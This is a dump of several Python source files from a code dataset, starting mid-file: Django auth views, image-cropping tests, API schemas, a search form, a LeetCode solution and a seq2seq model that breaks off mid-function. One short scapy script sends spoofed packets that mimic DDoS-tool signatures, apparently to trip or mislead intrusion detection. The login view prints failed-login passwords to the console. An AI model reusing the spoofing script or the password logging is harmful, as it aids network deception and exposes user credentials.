profile.save()\r\n registered = True\r\n else:\r\n print(user_form.errors,profile_form.errors)\r\n else:\r\n user_form = UserForm()\r\n profile_form = UserProfileInfoForm()\r\n return render(request,'eventapp/registration.html',\r\n {'user_form':user_form,\r\n 'profile_form':profile_form,\r\n 'registered':registered})\r\ndef user_login(request):\r\n if request.method == 'POST':\r\n username = request.POST.get('username')\r\n password = request.POST.get('password')\r\n user = authenticate(username=username, password=password)\r\n if user:\r\n if user.is_active:\r\n login(request,user)\r\n return HttpResponseRedirect(reverse('index'))\r\n else:\r\n return HttpResponse(\"Your account was inactive.\")\r\n else:\r\n print(\"Someone tried to login and failed.\")\r\n print(\"They used username: {} and password: {}\".format(username,password))\r\n return HttpResponse(\"Invalid login details given\")\r\n else:\r\n return render(request, 'eventapp/login.html', {})\r\n\r\n\r\n\r\ndef signup(request):\r\n if request.method == 'POST':\r\n form = SignUpForm(request.POST)\r\n if form.is_valid():\r\n user = form.save()\r\n user.is_active = False\r\n user.save()\r\n current_site = get_current_site(request)\r\n subject = 'Activate Your eventapp'\r\n message = render_to_string('account_activation_email.html', {\r\n 'user': user,\r\n 'domain': current_site.domain,\r\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\r\n 'token': account_activation_token.make_token(user),\r\n })\r\n user.email_user(subject, message)\r\n return redirect('account_activation_sent')\r\n else:\r\n form = SignUpForm()\r\n return render(request, 'eventapp/signup.html', {'form': form})\r\n\r\n\r\ndef activate(request, uidb64, token):\r\n try:\r\n uid = force_text(urlsafe_base64_decode(uidb64))\r\n user = User.objects.get(pk=uid)\r\n except (TypeError, ValueError, OverflowError, User.DoesNotExist):\r\n user = None\r\n\r\n if user is not None and account_activation_token.check_token(user, token):\r\n user.is_active = True\r\n user.profile.email_confirmed = True\r\n user.save()\r\n login(request, user)\r\n return redirect('home')\r\n else:\r\n return render(request, 
'account_activation_invalid.html')\r\n\r\n\r\n\r\n","sub_path":"eventapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"58227011","text":"# coding: utf8\nimport PIL.Image\nimport pkg_resources\nimport unittest\nimport zeit.cms.testing\nimport zeit.content.image.testing\nimport zeit.imp.interfaces\nimport zeit.imp.mask\nimport zeit.imp.source\nimport zope.interface.verify\n\n\nproduct_config = \"\"\"\n\n scale-source file://{base}/scales.xml\n color-source file://{base}/colors.xml\n \n\"\"\".format(base=pkg_resources.resource_filename(__name__, ''))\n\n\nCONFIG_LAYER = zeit.cms.testing.ProductConfigLayer(\n product_config, bases=(zeit.content.image.testing.CONFIG_LAYER,))\nZCML_LAYER = zeit.cms.testing.ZCMLLayer(bases=(CONFIG_LAYER,))\nZOPE_LAYER = zeit.cms.testing.ZopeLayer(bases=(ZCML_LAYER,))\nWSGI_LAYER = zeit.cms.testing.WSGILayer(bases=(ZOPE_LAYER,))\n\n\nclass BrowserTestCase(zeit.cms.testing.BrowserTestCase):\n\n layer = WSGI_LAYER\n\n\nclass TestLayerMask(unittest.TestCase):\n\n mask_colors = {(200, 200, 200, 220): 'x',\n (255, 0, 0, 0): ' ',\n (0, 0, 0, 255): '#',\n (0, 255, 0, 128): ' '}\n\n def assert_mask(self, expected, mask):\n mask_image = PIL.Image.open(mask.open('r'))\n width, height = mask_image.size\n got = []\n for y in range(height):\n line = []\n for x in range(width):\n line.append(self.mask_colors[mask_image.getpixel((x, y))])\n got.append(''.join(line))\n error_message = (\n 'The computed mask did not match the expected.\\n'\n 'Expected:\\n%s\\n\\nGot:\\n%s' % ('\\n'.join(expected),\n '\\n'.join(got)))\n self.assertEqual(expected, got, error_message)\n\n def test_mask_should_have_correct_size(self):\n # Create a 20x30 mask in an 150x100 image\n mask = zeit.imp.mask.Mask((10, 7), (6, 3), cross_size=0)\n expected = ['xxxxxxxxxx',\n 'xxxxxxxxxx',\n 'xx xx',\n 'xx xx',\n 'xx xx',\n 'xxxxxxxxxx',\n 'xxxxxxxxxx']\n self.assert_mask(expected, mask)\n\n def test_border_should_be_inside_given_mask_size(self):\n mask = zeit.imp.mask.Mask((20, 20), (10, 8), border=(0, 0, 0),\n cross_size=0)\n expected = ['xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxx##########xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx##########xxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx']\n self.assert_mask(expected, mask)\n\n def test_given_border_colour_should_be_used(self):\n mask = zeit.imp.mask.Mask((100, 100), (100, 100), border=(255, 0, 0))\n image = PIL.Image.open(mask.open('r'))\n self.assertEqual((255, 0, 0, 255), image.getpixel((0, 0)))\n\n def test_rect_box_should_match_given_mask_size(self):\n mask = zeit.imp.mask.Mask((150, 100), (20, 30))\n (x1, y1), (x2, y2) = mask._get_rect_box()\n # There is a rather missleading comment in the PIL documentation which\n # indicates that we need to pass 1px less than the expected size:\n # \"Note that the second coordinate pair defines a point just outside\n # the rectangle, also when the rectangle is not filled.\"\n self.assertEqual(19, x2 - x1)\n self.assertEqual(29, y2 - y1)\n\n\nclass TestSources(zeit.cms.testing.FunctionalTestCase):\n\n layer = ZOPE_LAYER\n\n def test_scale_source(self):\n source = zeit.imp.source.ScaleSource()(None)\n scales = list(source)\n self.assertEqual(7, len(scales))\n scale = scales[0]\n zope.interface.verify.verifyObject(\n zeit.imp.interfaces.IPossibleScale, scale)\n self.assertEqual('450x200', scale.name)\n 
self.assertEqual('450', scale.width)\n        self.assertEqual('200', scale.height)\n        self.assertEqual(u'Aufmacher groß (450×200)', scale.title)\n\n    def test_color_source(self):\n        source = zeit.imp.source.ColorSource()(None)\n        values = list(source)\n        self.assertEqual(3, len(values))\n        value = values[1]\n        zope.interface.verify.verifyObject(zeit.imp.interfaces.IColor, value)\n        self.assertEqual('schwarzer Rahmen (1 Pixel)', value.title)\n        self.assertEqual('#000000', value.color)\n\n\nclass TestCrop(zeit.cms.testing.FunctionalTestCase):\n\n    layer = ZOPE_LAYER\n\n    def setUp(self):\n        super(TestCrop, self).setUp()\n        self.group = (\n            zeit.content.image.testing.create_image_group_with_master_image())\n        self.crop = zeit.imp.interfaces.ICropper(self.group)\n\n    def get_histogram(self, image):\n        histogram = image.histogram()\n        r, g, b = histogram[:256], histogram[256:512], histogram[512:]\n        return r, g, b\n\n    def test_invalid_filter_raises_valueerror(self):\n        self.assertRaises(ValueError, self.crop.add_filter, 'foo', 1)\n\n    def test_brightness_filter(self):\n        # Factor 0 produces a solid black image. The histogram has only black\n        # in it\n        self.crop.add_filter('brightness', 0)\n        image = self.crop.crop(200, 200, 0, 0, 200, 200)\n        r, g, b = self.get_histogram(image)\n        self.assertEqual(40000, r[0])\n        self.assertEqual(40000, g[0])\n        self.assertEqual(40000, b[0])\n        self.assertEqual(0, sum(r[1:]))\n        self.assertEqual(0, sum(g[1:]))\n        self.assertEqual(0, sum(b[1:]))\n\n    def test_color_filter(self):\n        # Factor 0 gives a black and white image, so the channels are equal\n        self.crop.add_filter('color', 0)\n        image = self.crop.crop(200, 200, 0, 0, 200, 200)\n        r, g, b = self.get_histogram(image)\n        self.assertEqual(r, g)\n        self.assertEqual(r, b)\n\n    def test_contrast_filter(self):\n        # A contrast factor of 0 produces a solid gray image:\n        self.crop.add_filter('contrast', 0)\n        image = self.crop.crop(200, 200, 0, 0, 200, 200)\n        r, g, b = self.get_histogram(image)\n        self.assertEqual(40000, sum(r))\n        self.assertEqual(40000, sum(g))\n        self.assertEqual(40000, sum(b))\n        self.assertEqual(40000, r[99])\n        self.assertEqual(40000, g[99])\n        self.assertEqual(40000, b[99])\n\n    def test_sharpness_filter(self):\n        # Testing the sharpness is not quite trivial. We just check that the\n        # histograms have changed:\n        self.crop.add_filter('sharpness', 0)\n        image = self.crop.crop(200, 200, 0, 0, 200, 200)\n        r_smooth, g, b = self.get_histogram(image)\n\n        # Create the sharp image now\n        self.crop.filters[:] = []\n        self.crop.add_filter('sharpness', 1000)\n        image = self.crop.crop(200, 200, 0, 0, 200, 200)\n        r_sharp, g, b = self.get_histogram(image)\n        self.assertNotEqual(r_smooth, r_sharp)\n\n    def test_store(self):\n        self.crop.crop(200, 200, 0, 0, 200, 200)\n        image = zeit.imp.interfaces.IStorer(self.group).store(\n            'foo', self.crop.pil_image)\n        self.assertTrue(zeit.content.image.interfaces.IImage.providedBy(image))\n        self.assertIn('group-foo.jpg', self.group)\n\n    def test_border_applied_after_filters(self):\n        # The border must be applied after the filters. To verify this we\n        # create an image with no contrast which is solid gray. 
The border adds\n # some black.\n self.crop.add_filter('contrast', 0)\n image = self.crop.crop(200, 200, 0, 0, 200, 200, border=(0, 0, 0))\n r, g, b = self.get_histogram(image)\n self.assertNotEqual(40000, r[156])\n self.assertNotEqual(40000, g[156])\n self.assertNotEqual(40000, b[156])\n self.assertNotEqual(0, r[0])\n self.assertNotEqual(0, g[0])\n self.assertNotEqual(0, b[0])\n\n def test_border_color(self):\n image = self.crop.crop(200, 200, 0, 0, 200, 200,\n border=(127, 127, 127))\n self.assertEqual((127, 127, 127), image.getpixel((0, 0)))\n\n def test_border_on_grayscale_image(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/grayscale.jpg')))\n # The following used to fail with TypeError: an integer is required\n crop = zeit.imp.interfaces.ICropper(self.group)\n crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n\n def test_cmyk_converted_to_rgb(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/cmyk.jpg')))\n crop = zeit.imp.interfaces.ICropper(self.group)\n image = crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n self.assertEqual('RGB', image.mode)\n\n def test_palette_converted_to_rgb(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/palette.gif')))\n crop = zeit.imp.interfaces.ICropper(self.group)\n image = crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n self.assertEqual('RGB', image.mode)\n\n def test_png_converted_to_rgba(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/transparent.png')))\n crop = zeit.imp.interfaces.ICropper(self.group)\n image = crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n self.assertEqual('RGBA', image.mode)\n # Check that the alpha channel survives the cropping intact.\n self.assertEqual((183, 255, 159, 64), image.getpixel((100, 25)))\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestLayerMask))\n suite.addTest(unittest.makeSuite(TestSources))\n suite.addTest(unittest.makeSuite(TestCrop))\n return suite\n","sub_path":"core/src/zeit/imp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"231124555","text":"import re\nimport http\nimport functools\n\nimport marshmallow as ma\nfrom smore import swagger\nfrom marshmallow_sqlalchemy import ModelSchema\n\nfrom webservices import utils\nfrom webservices import paging\nfrom webservices.spec import spec\nfrom webservices.common import models\nfrom webservices import __API_VERSION__\n\n\ndef _get_class(value):\n return value if isinstance(value, type) else type(value)\n\n\ndef _format_ref(ref):\n return {'$ref': '#/definitions/{0}'.format(ref)}\n\n\ndef _schema_or_ref(schema):\n schema_class = _get_class(schema)\n ref = next(\n (\n ref_name\n for ref_schema, ref_name in spec.plugins['smore.ext.marshmallow']['refs'].items()\n if schema_class is _get_class(ref_schema)\n ),\n None,\n )\n return _format_ref(ref) if ref else swagger.schema2jsonschema(schema)\n\n\ndef marshal_with(schema, code=http.client.OK, description=None, wrap=True):\n def wrapper(func):\n func.__apidoc__ = getattr(func, '__apidoc__', {})\n func.__apidoc__.setdefault('responses', {}).update({\n code: {\n 'schema': _schema_or_ref(schema),\n 'description': description or '',\n }\n })\n\n if wrap:\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n return schema.dump(func(*args, **kwargs)).data\n return wrapped\n return func\n\n return wrapper\n\n\ndef register_schema(schema, definition_name=None):\n definition_name = definition_name or re.sub(r'Schema$', '', schema.__name__)\n spec.definition(definition_name, schema=schema())\n\n\ndef make_schema(model, class_name=None, fields=None, options=None):\n class_name = class_name or '{0}Schema'.format(model.__name__)\n\n Meta = type(\n 'Meta',\n (object, ),\n utils.extend(\n {\n 'model': model,\n 'sqla_session': models.db.session,\n 'exclude': ('idx', ),\n },\n options or {},\n )\n )\n\n return type(\n class_name,\n (ModelSchema, ),\n utils.extend({'Meta': Meta}, fields or {}),\n )\n\n\ndef make_page_schema(schema, page_type=paging.OffsetPageSchema, class_name=None,\n definition_name=None):\n class_name = class_name or '{0}PageSchema'.format(re.sub(r'Schema$', '', schema.__name__))\n definition_name = definition_name or re.sub(r'Schema$', '', schema.__name__)\n\n class Meta:\n results_schema_class = schema\n results_schema_options = {'ref': '#/definitions/{0}'.format(definition_name)}\n\n return type(\n class_name,\n (page_type, ApiSchema),\n {'Meta': Meta},\n )\n\n\nclass ApiSchema(ma.Schema):\n def _postprocess(self, data, many, obj):\n ret = {'api_version': __API_VERSION__}\n ret.update(data)\n return ret\n\n\nclass BaseSearchSchema(ma.Schema):\n id = ma.fields.Str()\n name = ma.fields.Str()\n\n\nclass CandidateSearchSchema(BaseSearchSchema):\n office_sought = ma.fields.Str()\n\n\nclass CommitteeSearchSchema(BaseSearchSchema):\n pass\n\n\nclass CandidateSearchListSchema(ApiSchema):\n results = ma.fields.Nested(\n CandidateSearchSchema,\n ref='#/definitions/CandidateSearch',\n many=True,\n )\n\n\nclass CommitteeSearchListSchema(ApiSchema):\n results = ma.fields.Nested(\n CandidateSearchSchema,\n ref='#/definitions/CommitteeSearch',\n many=True,\n )\n\n\nregister_schema(CandidateSearchSchema)\nregister_schema(CandidateSearchListSchema)\nregister_schema(CommitteeSearchSchema)\nregister_schema(CommitteeSearchListSchema)\n\n\nmake_committee_schema = functools.partial(make_schema, options={'exclude': ('idx', 'committee_key')})\nCommitteeSchema = make_committee_schema(models.Committee)\nCommitteeHistorySchema = make_committee_schema(models.CommitteeHistory)\nCommitteeDetailSchema = 
make_committee_schema(models.CommitteeDetail)\n\nCommitteePageSchema = make_page_schema(CommitteeSchema)\nCommitteeHistoryPageSchema = make_page_schema(CommitteeHistorySchema)\nCommitteeDetailPageSchema = make_page_schema(CommitteeDetailSchema)\n\nregister_schema(CommitteeSchema)\nregister_schema(CommitteeHistorySchema)\nregister_schema(CommitteeDetailSchema)\nregister_schema(CommitteePageSchema)\nregister_schema(CommitteeHistoryPageSchema)\nregister_schema(CommitteeDetailPageSchema)\n\n\nmake_candidate_schema = functools.partial(make_schema, options={'exclude': ('idx', 'candidate_key')})\nCandidateSchema = make_schema(\n models.Candidate,\n options={'exclude': ('idx', 'candidate_key', 'principal_committees')},\n)\nCandidateSearchSchema = make_candidate_schema(\n models.Candidate,\n fields={'principal_committees': ma.fields.Nested(CommitteeSchema, many=True)},\n)\nCandidateDetailSchema = make_candidate_schema(models.CandidateDetail)\nCandidateHistorySchema = make_candidate_schema(models.CandidateHistory)\n\nCandidatePageSchema = make_page_schema(CandidateSchema)\nCandidateDetailPageSchema = make_page_schema(CandidateDetailSchema)\nCandidateSearchPageSchema = make_page_schema(CandidateSearchSchema)\nCandidateHistoryPageSchema = make_page_schema(CandidateHistorySchema)\n\nregister_schema(CandidateSchema)\nregister_schema(CandidateDetailSchema)\nregister_schema(CandidateSearchSchema)\nregister_schema(CandidateHistorySchema)\n\nregister_schema(CandidatePageSchema)\nregister_schema(CandidateSearchPageSchema)\nregister_schema(CandidateDetailPageSchema)\nregister_schema(CandidateHistoryPageSchema)\n\n\nmake_reports_schema = functools.partial(\n make_schema,\n fields={\n 'pdf_url': ma.fields.Str(),\n 'report_form': ma.fields.Str(),\n 'committee_type': ma.fields.Str(attribute='committee.committee_type'),\n },\n options={'exclude': ('idx', 'report_key', 'committee')},\n)\n\nCommitteeReportsPresidentialSchema = make_reports_schema(models.CommitteeReportsPresidential)\nCommitteeReportsHouseSenateSchema = make_reports_schema(models.CommitteeReportsHouseSenate)\nCommitteeReportsPacPartySchema = make_reports_schema(models.CommitteeReportsPacParty)\nCommitteeReportsIEOnlySchema = make_reports_schema(models.CommitteeReportsIEOnly)\n\nCommitteeReportsPresidentialPageSchema = make_page_schema(CommitteeReportsPresidentialSchema)\nCommitteeReportsHouseSenatePageSchema = make_page_schema(CommitteeReportsHouseSenateSchema)\nCommitteeReportsPacPartyPageSchema = make_page_schema(CommitteeReportsPacPartySchema)\nCommitteeReportsIEOnlyPageSchema = make_page_schema(CommitteeReportsIEOnlySchema)\n\nreports_schemas = (\n CommitteeReportsPresidentialSchema,\n CommitteeReportsHouseSenateSchema,\n CommitteeReportsPacPartySchema,\n CommitteeReportsIEOnlySchema,\n)\nCommitteeReportsSchema = type('CommitteeReportsSchema', reports_schemas, {})\nCommitteeReportsPageSchema = make_page_schema(CommitteeReportsSchema)\n\nregister_schema(CommitteeReportsSchema)\nregister_schema(CommitteeReportsPageSchema)\n\nCommitteeTotalsPresidentialSchema = make_schema(models.CommitteeTotalsPresidential)\nCommitteeTotalsHouseSenateSchema = make_schema(models.CommitteeTotalsHouseSenate)\nCommitteeTotalsPacPartySchema = make_schema(models.CommitteeTotalsPacParty)\nCommitteeTotalsIEOnlySchema = make_schema(models.CommitteeTotalsIEOnly)\n\nCommitteeTotalsPresidentialPageSchema = make_page_schema(CommitteeTotalsPresidentialSchema)\nCommitteeTotalsHouseSenatePageSchema = 
make_page_schema(CommitteeTotalsHouseSenateSchema)\nCommitteeTotalsPacPartyPageSchema = make_page_schema(CommitteeTotalsPacPartySchema)\nCommitteeTotalsIEOnlyPageSchema = make_page_schema(CommitteeTotalsIEOnlySchema)\n\ntotals_schemas = (\n CommitteeTotalsPresidentialSchema,\n CommitteeTotalsHouseSenateSchema,\n CommitteeTotalsPacPartySchema,\n CommitteeTotalsIEOnlySchema,\n)\nCommitteeTotalsSchema = type('CommitteeTotalsSchema', totals_schemas, {})\nCommitteeTotalsPageSchema = make_page_schema(CommitteeTotalsSchema)\n\nregister_schema(CommitteeTotalsSchema)\nregister_schema(CommitteeTotalsPageSchema)\n\n\nScheduleASchema = make_schema(\n models.ScheduleA,\n fields={\n 'pdf_url': ma.fields.Str(),\n 'memoed_subtotal': ma.fields.Boolean(),\n 'committee': ma.fields.Nested(CommitteeHistorySchema),\n 'contributor': ma.fields.Nested(CommitteeHistorySchema),\n 'contributor_receipt_amount': ma.fields.Decimal(places=2),\n 'contributor_aggregate_ytd': ma.fields.Decimal(places=2),\n },\n options={\n 'exclude': ('memo_code', ),\n }\n)\nScheduleAPageSchema = make_page_schema(ScheduleASchema, page_type=paging.SeekPageSchema)\nregister_schema(ScheduleASchema)\nregister_schema(ScheduleAPageSchema)\n\nmake_aggregate_schema = functools.partial(\n make_schema,\n fields={\n 'total': ma.fields.Decimal(places=2),\n }\n)\nScheduleABySizeSchema = make_aggregate_schema(models.ScheduleABySize)\nScheduleAByStateSchema = make_aggregate_schema(models.ScheduleAByState)\nScheduleAByZipSchema = make_aggregate_schema(models.ScheduleAByZip)\n\nScheduleABySizePageSchema = make_page_schema(ScheduleABySizeSchema)\nScheduleAByStatePageSchema = make_page_schema(ScheduleAByStateSchema)\nScheduleAByZipPageSchema = make_page_schema(ScheduleAByZipSchema)\n\nregister_schema(ScheduleABySizeSchema)\nregister_schema(ScheduleAByStateSchema)\nregister_schema(ScheduleAByZipSchema)\nregister_schema(ScheduleABySizePageSchema)\nregister_schema(ScheduleAByStatePageSchema)\nregister_schema(ScheduleAByZipPageSchema)\n\n\nScheduleBSchema = make_schema(\n models.ScheduleB,\n fields={\n 'pdf_url': ma.fields.Str(),\n 'memoed_subtotal': ma.fields.Boolean(),\n 'committee': ma.fields.Nested(CommitteeHistorySchema),\n 'recipient_committee': ma.fields.Nested(CommitteeHistorySchema),\n 'disbursement_amount': ma.fields.Decimal(places=2),\n 'semi_annual_bundled_refund': ma.fields.Decimal(places=2),\n },\n options={\n 'exclude': ('memo_code', ),\n }\n)\nScheduleBPageSchema = make_page_schema(ScheduleBSchema, page_type=paging.SeekPageSchema)\nregister_schema(ScheduleBSchema)\nregister_schema(ScheduleBPageSchema)\n\n\nFilingsSchema = make_schema(\n models.Filings,\n fields={\n 'pdf_url': ma.fields.Str(),\n },\n)\nFilingsPageSchema = make_page_schema(FilingsSchema)\nregister_schema(FilingsSchema)\nregister_schema(FilingsPageSchema)\n","sub_path":"webservices/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"212379036","text":"# coding: utf-8\n\nfrom django import forms\nfrom interface.models import Region, Cuerpo, MaterialMayor\n\nclass MaterialMayorSearchForm(forms.Form):\n region = forms.ModelChoiceField(queryset=Region.objects.all(), required=False, empty_label='Nivel JNBC')\n cuerpo = forms.ModelChoiceField(queryset=Cuerpo.objects.order_by('nombre'), required=False,\n empty_label='Ver todos')\n incluir_dados_de_baja = forms.BooleanField(required=False)\n \n def get_filtered_material_mayor(self):\n self.full_clean()\n \n data = self.data\n\n material_mayor = MaterialMayor.objects.filter(validado_por_operaciones=True)\n\n if not 'incluir_dados_de_baja' in data or not data['incluir_dados_de_baja']:\n material_mayor = MaterialMayor.objects.filter(dada_de_baja__isnull=True)\n \n if 'region' in data and data['region'] and int(data['region']):\n material_mayor = material_mayor.filter(cuerpo__comuna__provincia__region__id=data['region'])\n else:\n material_mayor = material_mayor.filter(cuerpo__isnull=True)\n \n if 'cuerpo' in data and data['cuerpo'] and int(data['cuerpo']):\n material_mayor = material_mayor.filter(cuerpo__id=data['cuerpo'])\n\n \n return material_mayor\n \n def get_path(self):\n result = []\n \n d = self.data\n \n if 'region' in d and d['region'] and int(d['region']):\n result.append('region=%d' % int(d['region']))\n if 'cuerpo' in d and d['cuerpo'] and int(d['cuerpo']):\n result.append('cuerpo=%d' % int(d['cuerpo']))\n \n return '&'.join(result)\n","sub_path":"interface/forms/material_mayor_search_form.py","file_name":"material_mayor_search_form.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"181917638","text":"from scapy.all import *\r\ndef ddosTest(src,dst,iface,count):\r\n pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/RAW(load='1234')\r\n send(pkt,iface=iface,count=count)\r\n pkt=IP(src=src,dst=dst)/ICMP(type=0)/RAW(load='AAAAAAAAA')\r\n send(pkt,iface=iface,count=count)\r\n pkt=IP(src=src,dst=dst)/UDP(dport=31335)/RAW(load='PONG')\r\n send(pkt,iface=iface,count=count)\r\n pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456)\r\n send(pkt,iface=iface,count=count)\r\nsrc=\"1.3.3.7\"\r\ndst=\"192.168.1.106\"\r\niface=\"eth0\"\r\ncount=1\r\nddosTest(src,dst,iface,count)\r\n","sub_path":"idsFoil.py","file_name":"idsFoil.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"480492449","text":"\nclass Solution:\n def __init__(self):\n self.dic = dict()\n \n def canJump(self, nums: 'List[int]') -> bool:\n if len(nums) == 1:\n return True\n \n self.dic[0] = nums[0]\n for i in range(1, len(nums)):\n if self.dic[i-1] < i:\n return False\n \n self.dic[i] = max(self.dic[i-1], i + nums[i])\n \n return self.dic[len(nums)-1] >= len(nums) - 1\n \n\nsol = Solution()\nsol.canJump([2,3,1,1,4])\n\n","sub_path":"leetcode/Medium/JumpGame/JumpGame.py","file_name":"JumpGame.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"571045022","text":"import seq2seq_weak\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport torch \nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom torch import optim\nimport pickle, time\nimport torch\nfrom language import Lang\nimport random\nfrom torch.nn.utils.rnn import pack_padded_sequence as pack\nfrom torch.nn.utils.rnn import pad_packed_sequence as unpack\n\nuse_cuda = torch.cuda.is_available()\nMAX_LENGTH = 20\n\nclass Decoder(nn.Module):\n def __init__(self, args, voc_size, emb_size, hidden_size, bidirectional=False):\n super(Decoder, self).__init__()\n self.hidden_size = hidden_size\n self.emb_size = emb_size\n self.voc_size = voc_size\n if bidirectional:\n self.out = nn.Linear(self.hidden_size*2, self.voc_size)\n else:\n self.out = nn.Linear(self.hidden_size, self.voc_size)\n\n def forward(self, hidden):\n pred_word = self.out(hidden)\n return pred_word\n\n\nclass Encoder(nn.Module):\n def __init__(self, voc_size, emb_size, hidden_size, n_layers=1, bidirectional=False):\n super(Encoder, self).__init__()\n self.n_layers = n_layers\n self.hidden_size = hidden_size\n self.emb_size = emb_size\n self.bidirectional = bidirectional\n \n self.embedding = nn.Embedding(voc_size, emb_size, padding_idx=0)\n self.gru = nn.GRU(emb_size, hidden_size, num_layers=self.n_layers, batch_first=False,\n bidirectional=self.bidirectional)\n \n def load_emb(self, emb):\n emb = torch.from_numpy(np.array(emb, dtype=np.float32))\n self.embedding.weight.data.copy_(emb)\n \n def forward(self, input):\n '''\n input :: sl, bs\n\n return\n output :: sl, bs, nh*directions\n hidden :: n_layers*directions,bs, nh\n '''\n batch_size = input.size()[0]\n init_state = self.initHidden(batch_size)\n output, state = self.encode(input, init_state)\n return output, state\n \n def encode(self, input, hidden):\n '''\n input :: bs, sl\n\n return\n output :: bs, sl, nh*directions\n hidden :: n_layers*directions,bs, nh\n '''\n mask = torch.gt(input.data, 0)\n input_length = torch.sum((mask.long()), dim=1) # batch first = True, (batch, sl)\n lengths, indices = torch.sort(input_length, dim=0, descending=True)\n _, ind = torch.sort(indices, dim=0)\n input_length = torch.unbind(lengths, dim=0)\n embedded = self.embedding(torch.index_select(input, dim=0, index=Variable(indices)))\n output, hidden = self.gru(pack(embedded, input_length, batch_first=True), hidden)\n output = torch.index_select(unpack(output, batch_first=True)[0], dim=0, index=Variable(ind)) * Variable(\n torch.unsqueeze(mask.float(), -1))\n hidden = torch.unbind(hidden, dim=0)\n hidden = torch.cat(hidden, 1)\n hidden = torch.index_select(hidden, dim=0, index=Variable(ind))\n direction = 2 if self.bidirectional else 1\n assert hidden.size() == (input.size()[0], self.hidden_size*direction) and output.size() == (\n input.size()[0], input.size()[1], self.hidden_size * direction)\n return output, hidden\n \n def initHidden(self, batch_size):\n bid = 2 if self.bidirectional else 1\n result = Variable(torch.zeros(self.n_layers * bid, batch_size, self.hidden_size))\n if use_cuda:\n return result.cuda()\n return result\n\ndef target_padding(targets,length,pad_token=-1):\n result = [list() for i in range(len(targets))]\n for i in range(len(targets)):\n for j in range(len(targets[i])):\n if targets[i][j] < 1:\n break\n result[i].append(targets[i][j])\n while len(result[i]) < length:\n result[i].append(pad_token)\n return result\n\ndef multi_loss(logits, targets):\n '''\n logits :: bs, nv\n targets:: nclass, 
bs\n '''\n loss_func = torch.nn.MultiLabelMarginLoss()\n '''\n p = Variable(multi_hot(targets.data,logits.size()[1])) # bs, nv\n if use_cuda:\n p = p.cuda()\n '''\n loss = loss_func(input=F.sigmoid(logits),target=targets)\n return loss\n\ndef train(args, inputs, targets, encoder, decoder, optimizer, tgt_lang):\n optimizer.zero_grad()\n input_length = inputs.size()[1]\n target_length = targets.size()[1]\n batch_size = inputs.size()[0]\n loss = 0.\n\n # encoding part\n encoder_output, encoder_state = encoder(inputs)\n\n # decoding part\n pred_words = decoder(encoder_state) # bs, nv\n loss = multi_loss(pred_words, targets)\n loss.backward()\n optimizer.step()\n\n return loss.data\n\ndef evaluate(args, encoder, decoder, sentence, src_lang, tgt_lang, from_text=False, max_length=MAX_LENGTH):\n input_variable = seq2seq_weak.variable_from_sentence(src_lang,sentence, from_text)\n input_variable = torch.unsqueeze(input_variable, 0)\n input_length = input_variable.size()[1]\n encoder_output, encoder_state = encoder(input_variable)\n\n decoded_words = F.sigmoid(decoder(encoder_state))\n decoded_words = torch.squeeze(decoded_words)\n topv,topi = decoded_words.topk(max_length)\n results = []\n for v,i in zip(topv,topi):\n if v.data[0] > args.threshold:\n results.append(tgt_lang.id2word[i.data[0]])\n return results\n \ndef evaluate_all(args, data, encoder, decoder, src_lang, tgt_lang, from_text):\n hypothsis = []\n reference = []\n for s,t in tqdm(data, disable=not args.verbose):\n result = evaluate(args, encoder, decoder, list(s), src_lang=src_lang,tgt_lang=tgt_lang, from_text=from_text)\n hypothsis.append(result)\n if not from_text:\n reference.append([tgt_lang.id2word[word] for word in t])\n else:\n reference.append(t)\n precision, recall, F = seq2seq_weak.eval_F(reference, hypothsis, log_path='./log/'+args.log_dir)\n return precision, recall, F\n\ndef train_iters(args,encoder, 